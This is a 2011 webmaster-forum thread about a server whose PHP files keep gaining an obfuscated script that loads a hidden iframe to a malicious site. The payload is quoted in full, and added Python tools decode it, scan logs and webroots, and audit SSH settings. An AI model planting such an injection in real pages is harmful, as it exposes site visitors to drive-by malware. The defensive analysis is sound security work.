Welcome to the GoFuckYourself.com - Adult Webmaster Forum forums.
Old 08-25-2011, 09:08 AM   #1
camperjohn64 (Confirmed User; Join Date: Feb 2005; Location: Los Angeles; Posts: 1,531)
Server comprimised, now what?

I am getting this script, attached to the end of my PHP scripts all over my server:

Code:
<script>
// string fragments, assigned out of order so that no single token looks like a URL
yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';
vu=vp.concat(dk,x);            // "iframe"
qm=w.concat(hh);               // "src"
ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);  // "http://rewajuseva.com/k985ytv.htm"
var tq=document.createElement(vu);   // a 1x1 borderless iframe, invisible to the visitor
tq.setAttribute('width','1');
tq.setAttribute('height','1');
tq.frameBorder=0;
tq.setAttribute(qm,ka);
document.body.appendChild(tq);       // loads the remote page in every visitor's browser
</script>
I wrote a script to delete it, changed the passwords, but it's still showing up every xxx hours.

Now what??!!?!!

1) How can I find if the server is compromised?

2) How can I find if it's a script on my server that is automatically adding it?

3) What to do??

JM

Here is what I find on the net about that script:

http://blog.unmaskparasites.com/2011...ction-k985ytv/
__________________
www.gimmiegirlproductions.com

Last edited by camperjohn64; 08-25-2011 at 09:09 AM..
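The snippet is not encrypted, only split into fragments and reassembled with String.concat, so it can be decoded mechanically instead of by hand. The following Python is an added example (mine, not from the post or from the linked unmaskparasites article): it pulls every name='literal' assignment and every x.concat(...) call out of a script of this shape, resolves them, and reports which element the script creates and what its attribute is set to. The script text embedded in it is the one quoted above; the regexes and function names are my own.

```python
import re

# The injected snippet exactly as quoted in the post above (a 2011 sample; do not load the URL).
INJECTED = (
    "<script>yd='co';mh='m';im='a.';rm='h';my='5';t='m/';qg='v';vp='if';x='me';"
    "a='p:/';gv='a';q='/r';xk='.';ei='htt';y='k';cw='9';w='s';u='8';dk='ra';"
    "f='ytv';iy='e';l='jus';b='ew';hh='rc';h='t';vu=vp.concat(dk,x);qm=w.concat(hh);"
    "ka=ei.concat(a,q,b,gv,l,iy,qg,im,yd,t,y,cw,u,my,f,xk,rm,h,mh);"
    "var tq=document.createElement(vu);tq.setAttribute('width','1');"
    "tq.setAttribute('height','1');tq.frameBorder=0;tq.setAttribute(qm,ka);"
    "document.body.appendChild(tq);</script>"
)

# name='literal'  -- the fragments; the lookbehind skips property assignments such as obj.x='...'
LITERAL_RE = re.compile(r"(?<![\w.])([A-Za-z_]\w*)='([^']*)'")
# name=head.concat(a,b,...)  -- the reassembly
CONCAT_RE = re.compile(r"(?<![\w.])([A-Za-z_]\w*)=([A-Za-z_]\w*)\.concat\(([^)]*)\)")


def resolve_strings(script):
    """Map every variable the script builds to its final string value."""
    values = dict(LITERAL_RE.findall(script))
    for name, head, args in CONCAT_RE.findall(script):
        parts = [head] + [a.strip() for a in args.split(",") if a.strip()]
        # A KeyError here means a part was built some other way (eval, fromCharCode, ...):
        # that variant needs a look by hand rather than a guess.
        values[name] = "".join(values[p] for p in parts)
    return values


def describe_injection(script):
    """Return (element, attribute, value) for the element the script appends to the page."""
    values = resolve_strings(script)
    created = re.search(r"createElement\((\w+)\)", script)
    # only the setAttribute call whose arguments are variables, not the quoted width/height ones
    attr = re.search(r"setAttribute\((\w+),(\w+)\)", script)
    if not created or not attr:
        raise ValueError("script does not match the createElement/setAttribute layout")
    look = lambda name: values.get(name, name)
    return look(created.group(1)), look(attr.group(1)), look(attr.group(2))


if __name__ == "__main__":
    element, attribute, value = describe_injection(INJECTED)
    print("creates <%s> with %s=%s" % (element, attribute, value))
```

The two regexes double as a usable grep signature: a <script> tag followed by a run of one- or two-letter string assignments and a .concat( call is not something a legitimate template produces. Decoding only tells you where visitors are being sent; it says nothing about how the file was modified, which is the question the rest of this thread is about.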
Old 08-25-2011, 09:11 AM   #2
bronco67 (Too lazy to set a custom title; Join Date: Dec 2006; Posts: 29,032)
Your spelling skills have been compromised. Sorry, I couldn't resist.
Old 08-25-2011, 09:12 AM   #3
96ukssob (So Fucking Banananananas; Join Date: Mar 2003; Location: If I was in your ass you'd know it; Posts: 12,991)
sounds like you have a virus on your server, not that someone hacked it. had this happen a few years ago with a shitty host and had the same problem.

ask your host to run a virus scan or install some virus software. change all passwords, including root and disable SSH users (only 1 if you use it) and make sure if you have a way to upload files to one of your sites (i.e. videos) that you only allow certain formats and exclude .exe, etc, files.
Old 08-25-2011, 09:15 AM   #4
baddog (So Fucking Banned; Join Date: Apr 2001; Location: the beach, SoCal; Posts: 107,089)
Contact your host.
Old 08-25-2011, 09:15 AM   #5
Klen (Join Date: Aug 2006; Location: Little Vienna; Posts: 32,235)
You should be able to figure that out by yourself, I mean you are a hardcore programmer so you should be more qualified than me, for example. Unless I mistook you for someone else.
Old 08-25-2011, 09:20 AM   #6
bns666 (Confirmed Fetishist; Join Date: Mar 2005; Location: Fetishland; Posts: 11,539)
btw also check your win pc/laptop where you have saved ftp/ssh access passwords for your server; the problem might be there, not on the server.

happened to me a few years ago.
Old 08-25-2011, 09:21 AM   #7
scuba steve (Confirmed User; Join Date: Oct 2008; Location: i'm in miami bitch; Posts: 1,888)
hosting company should be able to fix/remedy it

isprime is always on top of this for us, most companies are
Old 08-25-2011, 09:27 AM   #8
Connor (Confirmed User; Join Date: Feb 2003; Posts: 1,294)
Who does your sys admin? You can hire someone if you have the budget for it.
Old 08-25-2011, 09:27 AM   #9
camperjohn64 (Confirmed User; Join Date: Feb 2005; Location: Los Angeles; Posts: 1,531)
Quote:
Originally Posted by bronco67 View Post
Your spelling skills have been compromised. Sorry, I couldn't resist.
Thanks.

I changed all passwords, disabled most ssh access. I read it is an FTP stolen password problem, so perhaps changing passwords will fix it.

The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...
Old 08-25-2011, 09:28 AM   #10
rowan (Too lazy to set a custom title; Join Date: Mar 2002; Location: Australia; Posts: 17,393)
If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code).

Your host should be the first step in asking for help. Ask if any unusual IPs have accessed your account via FTP. They may also be able to check web server logs for suspicious activity.

As the article you linked suggests, the problem may be related to your own computer, ie something running in the background and sniffing passwords.
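Rowan's FTP-log suggestion can be done with a few lines rather than by eyeballing the log. What follows is an added example of mine, not code from the thread: it parses xferlog-format lines (what proftpd and wu-ftpd write) and flags the source-IP pattern a stolen-credential bot leaves behind: one IP, several unrelated accounts, only script files, seconds apart. The log lines are constructed for the example, and the IP addresses, account names and paths in them are invented.

```python
from collections import defaultdict

# Constructed xferlog lines (not real server data). 203.0.113.5 plays the owner's workstation;
# 198.51.100.7 plays the host a stolen-credential bot looks like: one IP, three accounts,
# nothing but PHP files, a few seconds apart. The sixth line is an incomplete transfer.
SAMPLE_XFERLOG = """\
Thu Aug 25 02:10:03 2011 2 203.0.113.5 118233 /home/site1/public_html/videos/clip.mp4 b _ i r site1 ftp 0 * c
Thu Aug 25 03:12:44 2011 1 198.51.100.7 4231 /home/site1/public_html/index.php a _ i r site1 ftp 0 * c
Thu Aug 25 03:12:45 2011 1 198.51.100.7 5120 /home/site1/public_html/contact.php a _ i r site1 ftp 0 * c
Thu Aug 25 03:13:02 2011 1 198.51.100.7 3911 /home/site2/public_html/index.php a _ i r site2 ftp 0 * c
Thu Aug 25 03:13:10 2011 1 198.51.100.7 4007 /home/site3/public_html/index.php a _ i r site3 ftp 0 * c
Thu Aug 25 03:13:11 2011 0 198.51.100.7 0 /home/site3/public_html/x.php a _ i r site3 ftp 0 * i
Thu Aug 25 09:40:19 2011 1 203.0.113.5 4231 /home/site1/public_html/index.php a _ o r site1 ftp 0 * c
"""

# Files an attacker writes to change what visitors see; media uploads are the normal traffic.
SCRIPT_EXT = (".php", ".phtml", ".php5", ".htaccess", ".js", ".html", ".htm")


def parse_xferlog(text):
    """xferlog layout: five date tokens, transfer-time, remote-host, size, filename,
    transfer-type, special-action, direction (i=upload, o=download), access-mode,
    username, service, auth-method, auth-user-id, completion-status (c or i)."""
    records = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 18:
            continue                      # truncated line: leave it for a manual look
        records.append({"when": " ".join(f[:5]), "host": f[6], "size": int(f[7]),
                        "path": f[8], "direction": f[11], "user": f[13], "status": f[17]})
    return records


def suspicious_uploaders(records, trusted_hosts=()):
    """Group completed uploads by source IP and flag the patterns a password-stealer leaves."""
    per_host = defaultdict(lambda: {"users": set(), "uploads": 0, "scripts": []})
    for r in records:
        if r["direction"] != "i" or r["status"] != "c" or r["host"] in trusted_hosts:
            continue
        h = per_host[r["host"]]
        h["users"].add(r["user"])
        h["uploads"] += 1
        if r["path"].lower().endswith(SCRIPT_EXT):
            h["scripts"].append((r["when"], r["user"], r["path"]))
    findings = {}
    for host, h in per_host.items():
        reasons = []
        if len(h["users"]) > 1:           # one workstation does not normally own three sites' logins
            reasons.append("wrote into %d different accounts" % len(h["users"]))
        if h["scripts"]:
            reasons.append("uploaded %d script/html files" % len(h["scripts"]))
        if reasons:
            findings[host] = {"users": sorted(h["users"]), "reasons": reasons, "scripts": h["scripts"]}
    return findings


if __name__ == "__main__":
    for host, info in suspicious_uploaders(parse_xferlog(SAMPLE_XFERLOG), trusted_hosts={"203.0.113.5"}).items():
        print(host, info["users"], "; ".join(info["reasons"]))
        for when, user, path in info["scripts"]:
            print("   ", when, user, path)
```

Run it against the real transfer log (the path depends on the distro and on proftpd's TransferLog setting) with the owner's own addresses in trusted_hosts. Every account that appears under a flagged IP was logged into with a valid password: that is the evidence for the stolen-credential theory and, at the same time, the list of passwords that must be rotated. An IP that touched only one account tells you less, because that is also what the owner looks like from a new connection.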
Old 08-25-2011, 09:29 AM   #11
rowan (Too lazy to set a custom title; Join Date: Mar 2002; Location: Australia; Posts: 17,393)
Quote:
Originally Posted by camperjohn64 View Post
The real problem is, I am the host, and this is my first co-located server. I sense a learning experience coming on...
Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...
Old 08-25-2011, 09:34 AM   #12
raymor (Confirmed User; Join Date: Oct 2002; Posts: 3,745)
The second half of this page will give you a general outline as to how to secure your server - fixing stupid default PHP settings, getting rid of unused scripts, turning off suexec for sure, etc.:

https://bettercgi.com/strongbox/pass...adyhacked.html

Of course there have been 1,200 page books written on the topic, so that one page isn't comprehensive. You may need to talk to someone who has read the 1200 page books. If they can't get it, talk to someone who has WRITTEN one of the 1200 page books.
Old 08-25-2011, 09:45 AM   #13
camperjohn64 (Confirmed User; Join Date: Feb 2005; Location: Los Angeles; Posts: 1,531)
Quote:
Originally Posted by rowan View Post
Ok, well that complicates things a bit. Do you know anything about server admin? And I don't mean clicking buttons on a control panel webpage...
Yes, actually I don't use a control panel. I wanted to make sure I learned all the linux command line issues from the ground up. I have webmin, but never use it. Maybe I should disable that.

I have updated all software, changed all passwords, no suexec, changed ports for ssh, turned off all default settings for apache / php / phpmyadmin.

The server is at 67.21.112.158...please test if you can get in or there is something I should fix asap.

Oops, first thing is to change the default welcome page. :-(
Old 08-25-2011, 09:52 AM   #14
camperjohn64 (Confirmed User; Join Date: Feb 2005; Location: Los Angeles; Posts: 1,531)
Quote:
Originally Posted by rowan View Post
If you're lucky it's just a script hole rather than a full blown server compromise. The code keeps reappearing because you're treating the symptom (deleting the code) rather than the problem (how they're creating that code)
...
I think this is the case. On accounts that I have changed the passwords on, it appears to no longer be infecting those accounts.

I'm a good php programmer, but a lousy admin.
Old 08-25-2011, 10:02 AM   #15
PornDiscounts-R (Confirmed User; Join Date: Aug 2006; Location: Denmark; Posts: 1,272)
Quote:
Originally Posted by camperjohn64 View Post
I think this is the case. On accounts that I have changed the passwords on, it appears to no longer be infecting those accounts.

I'm a good php programmer, but a lousy admin.
The url in your sig is giving a nice big trojan warning too
Old 08-25-2011, 10:08 AM   #16
camperjohn64 (Confirmed User; Join Date: Feb 2005; Location: Los Angeles; Posts: 1,531)
Quote:
Originally Posted by thebestamateur View Post
The url in your sig is giving a nice big trojan warning too
Thank you. Fixing.

I think I will turn off proftp for a few hours and see if the script appears. This will confirm if it's getting in through that.
Old 08-25-2011, 10:38 AM   #17
Babaganoosh (♥♥♥ Likes Hugs ♥♥♥; Join Date: Nov 2001; Location: /home; Posts: 15,841)
FTP? Yikes, don't use FTP. Remove any ftp daemon on the box and use SSH.
Old 08-25-2011, 10:47 AM   #18
iamtam (So Fucking Banned; Join Date: Feb 2010; Posts: 1,211)
it probably isn't ftp. it is probably some out of date software on your machine with an sql injection or overflow that allows them to access your machine. check all software you use (like wordpress, phpmyadmin, or others) for more recent updates. check for files with 777 permissions, which is always a problem and check things like upload directories for .jpg.php files (which usually pass sanitizers).
Old 08-25-2011, 10:58 AM   #19
CYF (Coupon Guru; Join Date: Mar 2009; Location: Minneapolis; Posts: 10,973)
there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
Old 08-25-2011, 11:15 AM   #20
Babaganoosh (♥♥♥ Likes Hugs ♥♥♥; Join Date: Nov 2001; Location: /home; Posts: 15,841)
Are you a filezilla user by chance? This is something they're faced with more and more often.
Old 08-25-2011, 11:23 AM   #21
camperjohn64 (Confirmed User; Join Date: Feb 2005; Location: Los Angeles; Posts: 1,531)
Quote:
Originally Posted by CYF View Post
there is malware for PCs that will use your stored FTP passwords and upload crap to your servers. Might want to check into that as well.
I think this was the case. I reformatted my main machine about two weeks ago because "something funny" was going on. That was the only machine that I was using to upload to the sites that were hacked.

So the root SSH was not compromised, nor were any accounts for friends that I am hosting. Suggesting, the problem was that machine was freely sending out passwords.

All accounts changed, new machine has new virus software on it, server "appears" stable as of 10am...

The good thing is that it appears my home machine was hacked, not the server itself. Also, I don't have any ability to FTP to any sites that are important. Only ssh on non-standard ports.

I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.
Old 08-25-2011, 06:18 PM   #22
livexxx (Confirmed User; Join Date: May 2005; Location: UK; Posts: 1,201)
Quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. Try doing something like scanning all your files for some of those data patterns, providing they didn't encrypt their upload.
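iamtam's checks (777 permissions, .jpg.php files in upload directories) and livexxx's suggestion to scan every file for the injection pattern fit into one pass over the document root. The script below is an added example of mine, not code from either post: it walks a webroot, lists world-writable files and directories, scripts sitting in media directories, web files changed in the last two days, and files carrying the concat-style <script> block, and it strips that block while keeping the infected original (mtime intact) in a quarantine directory outside the webroot. The upload directory names, the sample files and the stand-in injection string are constructed for the example.

```python
import os
import re
import shutil
import stat
import tempfile
import time

# Shape of the injection quoted earlier in the thread: a <script> block that opens with a run of
# short string assignments and then glues them together with .concat(). Bytes, not str, so that
# files in any encoding survive the rewrite unchanged apart from the removed block.
INJECTION_RE = re.compile(rb"<script>(?:\w+='[^']*';)+[^<]*?\.concat\([^<]*?</script>")
# Constructed stand-in with the same shape (points at a made-up host), not the real snippet.
INJECTION_SAMPLE = (b"<script>a='if';b='rame';c='http://';d='malware.example';x=a.concat(b);"
                    b"y=c.concat(d);var t=document.createElement(x);t.setAttribute('src',y);"
                    b"document.body.appendChild(t);</script>")

WEB_EXT = (".php", ".phtml", ".html", ".htm", ".js")
# "photo.jpg.php" in a media directory: the upload-filter bypass that still executes as PHP
DOUBLE_EXT_RE = re.compile(r"\.(?:jpe?g|png|gif|mp4|wmv|avi)\.(?:php\d?|phtml|phar)$", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(?:php\d?|phtml|phar)$", re.I)
UPLOAD_DIRS = ("uploads", "images", "videos")   # assumption: adjust to the site's layout


def scan_webroot(root, upload_dirs=UPLOAD_DIRS, recent_hours=48, now=None):
    """Walk a document root and collect the four kinds of evidence worth looking at first."""
    now = time.time() if now is None else now
    found = {"injected": [], "world_writable": [], "scripts_in_upload_dirs": [], "recently_modified": []}
    for dirpath, _dirnames, filenames in os.walk(root):
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            found["world_writable"].append(dirpath)
        in_upload_dir = any(p in upload_dirs for p in os.path.relpath(dirpath, root).split(os.sep))
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            if st.st_mode & stat.S_IWOTH:
                found["world_writable"].append(path)
            if in_upload_dir and (DOUBLE_EXT_RE.search(name) or SCRIPT_EXT_RE.search(name)):
                found["scripts_in_upload_dirs"].append(path)
            if not name.lower().endswith(WEB_EXT):
                continue
            if now - st.st_mtime < recent_hours * 3600:
                found["recently_modified"].append(path)
            with open(path, "rb") as fh:
                if INJECTION_RE.search(fh.read()):
                    found["injected"].append(path)
    return found


def strip_injection(path, quarantine_dir, root):
    """Remove the injected block(s); keep the infected original, mtime intact, outside the webroot."""
    with open(path, "rb") as fh:
        original = fh.read()
    cleaned, count = INJECTION_RE.subn(b"", original)
    if count:
        evidence = os.path.join(quarantine_dir, os.path.relpath(path, root).replace(os.sep, "__"))
        shutil.copy2(path, evidence)       # copy2 preserves the timestamps the attacker left behind
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return count


def demo():
    """Build a small constructed webroot, scan it, clean the injected file, and report."""
    root = tempfile.mkdtemp(prefix="webroot-")
    quarantine = tempfile.mkdtemp(prefix="quarantine-")
    now = time.time()
    sample = {
        "index.php": b"<?php include 'header.php'; ?>\n<body>hello</body>\n" + INJECTION_SAMPLE,
        "about.html": b"<html><body>clean page</body></html>\n",
        "lib/old.php": b"<?php function helper() {} ?>\n",
        "uploads/photo.jpg": b"\xff\xd8\xff\xe0 not really a jpeg",
        "uploads/photo.jpg.php": b"<?php /* dropped through the image uploader */ ?>\n",
    }
    for rel, content in sample.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
        os.chmod(path, 0o644)
    for d in ("lib", "uploads"):
        os.chmod(os.path.join(root, d), 0o755)
    os.chmod(os.path.join(root, "uploads"), 0o777)              # the 777 upload dir iamtam warns about
    month_ago = now - 30 * 86400
    os.utime(os.path.join(root, "lib", "old.php"), (month_ago, month_ago))
    try:
        before = scan_webroot(root, now=now)
        stripped = sum(strip_injection(p, quarantine, root) for p in before["injected"])
        after = scan_webroot(root, now=now)
        rel = lambda paths: sorted(os.path.relpath(p, root) for p in paths)
        return {"before": {k: rel(v) for k, v in before.items()}, "stripped": stripped,
                "injected_after": len(after["injected"]), "quarantined": sorted(os.listdir(quarantine))}
    finally:
        shutil.rmtree(root)
        shutil.rmtree(quarantine)


if __name__ == "__main__":
    print(demo())
```

Point scan_webroot at /home/*/public_html before cleaning anything. The recently_modified list is what a livexxx-style dropper, if there is one, would have touched, and the mtime on the quarantined copies narrows down when each file was hit, which is the timestamp to look for in the FTP and web server logs. Matching on the .concat( shape catches this family only; a different dropper needs a different signature, and cleaning without finding the writer just restarts the cycle the thread is describing.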
Old 08-25-2011, 06:27 PM   #23
CYF (Coupon Guru; Join Date: Mar 2009; Location: Minneapolis; Posts: 10,973)
Quote:
Originally Posted by camperjohn64 View Post
I will disable remote-root password ability once this blows over. Must login to another account, then su if I want to get to root - I forget what that feature is called.
are you talking about using public keys instead of passwords? That's what I do on my machines.

I would also suggest not using ftp anymore. sftp is so much better. Also would recommend against storing passwords anywhere.
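The feature camperjohn64 is reaching for is the PermitRootLogin directive in sshd_config, and CYF's key-only login is PasswordAuthentication no. The fragments and checker below are an added example of mine, not anything from the thread: one constructed config with the defaults of the time next to a hardened one, and a small parser that applies sshd's own rules (the first occurrence of a keyword wins, keywords are case-insensitive) to report what is still open. The user names and the port number are placeholders.

```python
import re

# Two constructed sshd_config fragments: roughly what a 2011-era distro shipped, and what
# "log in as a normal user, then su" plus key-only authentication looks like in the config.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
ChallengeResponseAuthentication yes
UsePAM yes
"""

HARDENED_CONFIG = """\
Port 2222
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
ChallengeResponseAuthentication no
UsePAM yes
AllowUsers john deploy
"""

# What applies when a keyword is absent (OpenSSH 5.x era; later releases default
# PermitRootLogin to prohibit-password, which the check below also accepts).
DEFAULTS = {"permitrootlogin": "yes", "passwordauthentication": "yes",
            "challengeresponseauthentication": "yes", "pubkeyauthentication": "yes"}


def parse_sshd_config(text):
    """Effective global settings. Keywords are case-insensitive, the FIRST occurrence wins,
    and everything after a Match line is conditional, so parsing stops there."""
    effective = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)   # "Key value" or "Key=value"
        key = parts[0].lower()
        if key == "match":
            break
        effective.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    return effective


def audit_sshd_config(text):
    """Return findings; an empty list means remote root and password logins are both closed."""
    eff = {**DEFAULTS, **parse_sshd_config(text)}
    findings = []
    if eff["permitrootlogin"].lower() not in ("no", "prohibit-password", "without-password", "forced-commands-only"):
        findings.append("PermitRootLogin %s: root is a remote password-guessing target" % eff["permitrootlogin"])
    if eff["passwordauthentication"].lower() != "no":
        findings.append("PasswordAuthentication yes: a stolen or sniffed password is enough to get in")
    elif eff["challengeresponseauthentication"].lower() != "no":
        # the usual leftover: PAM keyboard-interactive still prompts for the password
        findings.append("ChallengeResponseAuthentication yes: keyboard-interactive still accepts passwords")
    if eff["pubkeyauthentication"].lower() == "no":
        findings.append("PubkeyAuthentication no: nothing left to log in with once passwords are off")
    if "allowusers" not in eff and "allowgroups" not in eff:
        findings.append("no AllowUsers/AllowGroups: every local account is reachable over SSH")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_sshd_config(cfg) or ["ok"])
```

The ChallengeResponseAuthentication check is the trap: with UsePAM yes, turning off PasswordAuthentication alone still leaves keyboard-interactive password prompts working. Anything after a Match line is conditional and is ignored here; sshd -T prints the effective configuration including those. Install the public key and confirm a key-only login from a second terminal before restarting sshd and closing the session you are in, or the lockout CYF's setup is meant to prevent lands on you instead.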
Old 08-25-2011, 06:29 PM   #24
camperjohn64 (Confirmed User; Join Date: Feb 2005; Location: Los Angeles; Posts: 1,531)
Quote:
Originally Posted by livexxx View Post
Quite often someone will have uploaded a script somehow onto the server that is sitting in an image upload dir or some other directory. They can then call that up every now and then and it just fires off and scans all your dirs and adds that script to the end of files. So changing your passwords etc is like after the horse has bolted. Try doing something like scanning all your files for some of those data patterns, providing they didn't encrypt their upload.
I turned off proftpd and the script is still being added to the files. This means it isn't an FTP upload / password issue. The horse has bolted.

This means the server is infected with something.

It seems this will be my project for tonight. Must eat dinner now, but will try to find it.

Thoughts?
Old 08-25-2011, 06:33 PM   #25
HomerSimpson (Too lazy to set a custom title; Join Date: Sep 2005; Location: Springfield; Posts: 13,826)
now you hire me...

www.awmzone.com/services